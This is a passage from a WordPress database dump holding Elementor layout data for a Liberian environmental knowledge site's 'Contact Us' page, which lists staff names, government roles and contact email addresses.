Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23308,3383,'_elementor_edit_mode','builder'),(23309,3383,'_elementor_template_type','wp-page'),(23310,3383,'_elementor_version','3.0.16'),(23311,3383,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (23312,3383,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\nManager, ESIA\\nDepartment of Compliance and Enforcement\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Daoda S. Carlon <\\/strong>\\n<p>Assistant Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA <\\/br>\\ncarlonbaindu@gmail.com\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br 